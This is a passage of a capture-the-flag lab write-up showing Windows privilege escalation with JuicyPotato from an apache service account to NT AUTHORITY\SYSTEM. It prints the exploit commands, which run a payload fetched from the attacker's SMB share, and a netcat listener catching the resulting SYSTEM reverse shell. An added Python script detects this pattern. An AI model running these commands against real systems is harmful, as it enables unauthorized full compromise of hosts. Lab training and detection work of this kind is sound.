JuicyPotato
The current user, apache, is a service account and has SeImpersonatePrivilege enabled.
Given that the target system is very old and runs on the x86 architecture, I can try to use JuicyPotato.
C:\tmp> \\192.168.45.245\smb\JuicyPotato.x86.exe -t * -p "\\192.168.45.245\smb\pe.exe" -l 12345
Testing {4991D34B-80A1-4291-B697-000000000000} 12345
COM -> recv failed with error: 10038
The initial execution fails with an error. This error usually occurs when the execution is attempted with a CLSID that isn't present on the target system.
Find a CLSID
There is an online tool that lists known CLSIDs by Windows version.
An instance of TrustedInstaller was identified during the manual enumeration. This can be leveraged.
Exploitation
C:\tmp> \\192.168.45.245\smb\JuicyPotato.x86.exe -t * -l 11111 -p "\\192.168.45.245\smb\pe.exe" -c "{752073A1-23F2-4396-85F0-8FDB879ED0ED}"
Testing {752073A1-23F2-4396-85F0-8FDB879ED0ED} 11111
....
[+] authresult 0
{752073A1-23F2-4396-85F0-8FDB879ED0ED};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
Using one of TrustedInstaller's CLSIDs works, and the payload is executed via the in-memory method.
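From the defender's side, the escalation above leaves a recognisable trace: a process owned by a service account (apache) becomes the parent of a process running as NT AUTHORITY\SYSTEM, and the tool itself is launched with a CLSID, a listener port (-l) and a payload (-p). The following is an added detection example, not code from the original write-up; the record shape (image, user, parent_image, parent_user, command_line) is a Sysmon Event ID 1-like assumption, and the events are constructed from the values shown on this page.

```python
from __future__ import annotations
import re
from typing import Iterable

# Local service accounts that should never be the parent of a SYSTEM process
# (assumed list; extend with the service identities present in your estate).
SERVICE_ACCOUNTS = {"apache", "iusr", "local service", "network service"}
SYSTEM = "nt authority\\system"
# JuicyPotato-style command line: a CLSID plus a listener port (-l) and payload (-p).
CLSID_RE = re.compile(r"\{[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\}", re.I)


def account(user: str) -> str:
    """'LIVDA\\apache' -> 'apache'; 'NT AUTHORITY\\SYSTEM' is kept whole (lower-cased)."""
    u = user.lower()
    return u if u == SYSTEM else u.rsplit("\\", 1)[-1]


def detect(events: Iterable[dict]) -> list[tuple[str, str]]:
    """Return (rule, image) pairs for events that look like potato-style escalation."""
    hits = []
    for ev in events:
        img, cmd = ev["image"], ev.get("command_line", "")
        # Rule 1: a service-account process became the parent of a SYSTEM process.
        # Legitimate elevation goes through services.exe or a scheduled task, not httpd.
        if account(ev["parent_user"]) in SERVICE_ACCOUNTS and account(ev["user"]) == SYSTEM:
            hits.append(("service-account parent spawned SYSTEM child", img))
        # Rule 2: the process was launched with JuicyPotato-style arguments.
        elif CLSID_RE.search(cmd) and " -l " in cmd and " -p " in cmd:
            hits.append(("juicypotato-style command line", img))
    return hits


# Constructed sample events modelled on the session in this write-up.
EVENTS = [
    # Normal service start: the SCM (SYSTEM) launches httpd as apache. Benign.
    {"image": r"C:\xampp\apache\bin\httpd.exe", "user": r"LIVDA\apache",
     "parent_image": r"C:\Windows\System32\services.exe", "parent_user": r"NT AUTHORITY\SYSTEM"},
    # JuicyPotato run as apache with CLSID, listener port and payload.
    {"image": r"C:\tmp\JuicyPotato.x86.exe", "user": r"LIVDA\apache",
     "parent_image": r"C:\xampp\apache\bin\httpd.exe", "parent_user": r"LIVDA\apache",
     "command_line": 'JuicyPotato.x86.exe -t * -l 11111 -p "\\\\192.168.45.245\\smb\\pe.exe" '
                     '-c "{752073A1-23F2-4396-85F0-8FDB879ED0ED}"'},
    # The payload comes up as SYSTEM with the apache-owned process as its parent.
    {"image": r"\\192.168.45.245\smb\pe.exe", "user": r"NT AUTHORITY\SYSTEM",
     "parent_image": r"C:\tmp\JuicyPotato.x86.exe", "parent_user": r"LIVDA\apache"},
]

if __name__ == "__main__":
    for rule, image in detect(EVENTS):
        print(f"[ALERT] {rule}: {image}")
```

Rule 1 is the durable signal: renaming the binary or picking another CLSID does not change the fact that a service-account process parented a SYSTEM one.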
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/authby]
└─$ nnc 8080
listening on [any] 8080 ...
connect to [192.168.45.245] from (UNKNOWN) [192.168.221.46] 49387
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
whoami
nt authority\system
C:\Windows\system32> hostname
hostname
LIVDA
C:\Windows\system32> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection 2:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::f03d:1dc2:6436:3997%12
IPv4 Address. . . . . . . . . . . : 192.168.221.46
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.221.254
Tunnel adapter Local Area Connection*:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Tunnel adapter Local Area Connection* 9:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
System-level compromise